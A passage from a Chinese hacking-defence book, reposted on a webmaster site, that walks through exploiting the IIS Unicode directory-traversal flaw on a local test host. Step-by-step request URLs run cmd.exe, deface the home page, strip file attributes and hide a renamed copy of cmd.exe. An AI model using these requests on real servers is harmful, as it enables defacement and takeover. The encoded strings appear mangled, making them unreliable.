中国站长下载-为中国站长提供最好最全的建站资源! 首 页发布资源有事留言繁體中文
设为首页
加入收藏
联系我们
 
您当前的位置:中国站长下载 -> 文章中心 -> 网络安全 -> 基础知识 -> 文章内容  虚拟主机 域名注册 退出登录 用户管理
栏目导航
· 基础知识 · 安全防范
· 防 火 墙 · 其他相关
热门文章
· sndvol32 - sndvol3...
· [组图] FLASH:《大话李白》...
· 个人网站到底能赚多...
· [图文] Rundll.exe是病毒吗...
· [组图] Flash:制作MV
· 价值12万元的网站SE...
· 网站创业者,你需要...
· 一个成功的网站设计...
· [图文] FLASH:韩国导航条解...
· 中国网站的赚钱模式...
相关文章
· [图文] FlashMX 视频教程(1...
· 中国黑客超强X档案 ...
· 网络孙子兵法!黑客...
· 注意:纠正14条日常...
· ASP.NET热点问题解答...
· 亲密接触ASP.Net(14...
· 防火墙的技术与应用...
· [图文] 防火墙的技术与应用...
· 黑客攻防技术内幕-解...
· 黑客攻防技术内幕-解...
黑客攻防技术内幕-防止入侵的方法(14)
作者:风未起时  来源:中国站长学院中国站长学院  发布时间:2006-5-19 14:31:40  发布人:chinazhan

 减小字体 增大字体

6.9 UNICODE漏洞入侵(3)

    

6.9.2  利用UNICODE漏洞攻击网站

(1) 入侵者在手工或是使用扫描工具找到有UNICODE漏洞的服务器后,在浏览器中输入:

http://目标机/scripts/..Á../winnt/system32/cmd.exe?/c+dir+c:\

http://目标机/scripts/..À/../winnt/system32/cmd.exe?/c+dir+c:\

(其他编码检测请参阅本书3.7.1 节中UNICODE漏洞的修补)

通过以上输入向服务器发出请求,得到结果如图6-80所示。

6-80  UNICODE漏洞

这里以本机(IP127.0.0.1)存在的UNICODE漏洞进行检测,从图6-80中可以看到被检测服务器的C盘目录被列了出来,这就是所谓的UNICODE漏洞,也叫目录遍历漏洞。

(2) 接下来入侵者将会去查找服务器所存放主页的位置,接着在浏览器中向存有UNICODE漏洞的服务器发送一条请求,请求内容如下:

http://127.0.0.1/scripts/..Á../winnt/system32/cmd.exe?/c+set 

或是

http://127.0.0.1/scripts/..À/../winnt/system32/cmd.exe?/c+set

得到的结果如图6-81所示。

6-81  查看服务器信息

6-81是利用set命令列出了服务器的信息,set 命令是显示目标主机当前的环境变量的,从PATH_TRANSLATED=d:\inetpub\wwwroot这一条可以看出服务器主页所存放的位置是默认位置,也就是在d:\inetpub\wwwroot下。如果该服务器还存在.IDQ/.IDA 漏洞话,向目标机提交http://127.0.0.1/.idq  或者是http://127.0.0.1/.ida也可以得到目标服务器存放主页的位置,如图6-82所示。

6-82  .IDA漏洞查主页存放位置

根据图6-84也同样可以看出主页存放位置是d:\inetpub\wwwroot

(3) 入侵者向服务器提交一条请求进入d:\inetpub\wwwroot (目标服务器主页存放位置),内容如下:

http://127.0.0.1/scripts/..Á../winnt/system32/cmd.exe?/c+dir+d:\inetpub\wwwroot

或是:

http://127.0.0.1/scripts/..À/../winnt/system32/cmd.exe?/c+dir+d:\inetpub\wwwroot

得到的请求结果如图6-83所示。

6-83  进入目标服务器主页存放位置

(4) 接下来入侵者将会更改网站主页,一般首页文件名为:index.htmindex.aspdefault.asp等,入侵者将会向存有UNICODE漏洞的服务器提交以下请求:

http://127.0.0.1/scripts/..Á../winnt/system32/cmd".exe?/c+echo+网站有漏洞+请修补+>d:\inetpub\wwwroot\index.htm

如图6-846-85所示。

6-84  入侵者利用echo命令修改主页

6-85  被入侵者所修改的主页

6-84中入侵者所用到的方法就是利用echo回显、管道工具>>>,从而达到了简单的更改主页的目的。

服务器在加载程序时,如果检测到有cmd.exe或者command.com串就要检测特殊字符【& | ( , ; % < >】如果发现有这些字符就会返回500错误,所以不能直接使用cmd.exe加管道符,比如向浏览器中输入:

http://127.0.0.1/scripts/..Á../winnt/system32/cmd.exe?/c+echo+网站有漏洞+请修补+>d:\inetpub\wwwroot\index.htm  

则会出现HTTP 500内部服务器错误信息,如图6-86所示。

6-86  服务器内部出错信息

如果入侵者在cmd后面加入字符",再结合回显命令和管道命令就可以轻松地实现更改主页的目的,如图6-84所示。

(5) 如果一个入侵者在更改页面时运行:

http://127.0.0.1/scripts/..Á../winnt/system32/cmd".exe?/c+echo+网站有漏洞+请修补 +>d:\inetpub\wwwroot\index.htm

则出现如图6-87所示的结果。

6-87  无法更改页面

6-87的内容说明没有权限更改该页面,一是由于权限不够,二是说明该页面属性是只读属性。如果该页面是只读属性,那么入侵者接着会执行以下一条内容,去掉该文件的只读属性,从而达到更改主页的目的:

http://127.0.0.1/scripts/..Á../winnt/system32/attrib.exe? -r -h d:\inetpub\wwwroot\index.htm

如图6-88所示。

6-88  去掉网页index.htm的只读、隐藏属性

(6) 为了方便输入,入侵者将cmd.exe复制到scripts文件夹下,为防止管理员发现将其改名为win.exe(如图6-69所示),然后向服务器提交以下内容:

http://127.0.0.1/scripts/win.exe?/c+echo+有漏洞请修补+>d:\inetpub\wwwroot\index.htm

修改的结果如图6-84所示。


 
[] [返回上一页] [打 印] [收 藏]
∷相关文章评论∷    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
中国站长下载
中国站长下载

本页只接受PR>=4 IT类站点连接,申请连接,谢谢您们的支持!希望我们的下载站能够真正帮到中国的站长们!
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图
Copyright © 2005-2006 ChinaZhan.Net. All Rights Reserved .